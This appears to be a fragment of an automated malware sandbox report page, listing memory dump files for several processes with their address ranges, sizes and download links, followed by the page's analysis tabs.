memory/1144-29-0x0000000005A80000-0x0000000005AE6000-memory.dmp

Filesize
408KB

Download
memory/1144-39-0x0000000005B70000-0x0000000005EC4000-memory.dmp

Filesize
3.3MB

Download
memory/1144-43-0x00000000079F0000-0x000000000806A000-memory.dmp

Filesize
6.5MB

Download
memory/1144-41-0x00000000061A0000-0x00000000061BE000-memory.dmp

Filesize
120KB

Download
memory/1144-42-0x00000000061E0000-0x000000000622C000-memory.dmp

Filesize
304KB

Download
memory/1456-16-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-24-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-19-0x00007FFBD1F33000-0x00007FFBD1F35000-memory.dmp

Filesize
8KB

Download
memory/1456-4-0x00007FFBD1F33000-0x00007FFBD1F35000-memory.dmp

Filesize
8KB

Download
memory/1456-21-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-15-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-20-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-14-0x0000022BAE700000-0x0000022BAE722000-memory.dmp

Filesize
136KB

Download
memory/5020-62-0x0000000000F10000-0x0000000002164000-memory.dmp

Filesize
18.3MB

Download
memory/5020-63-0x0000000000F10000-0x0000000002164000-memory.dmp

Filesize
18.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads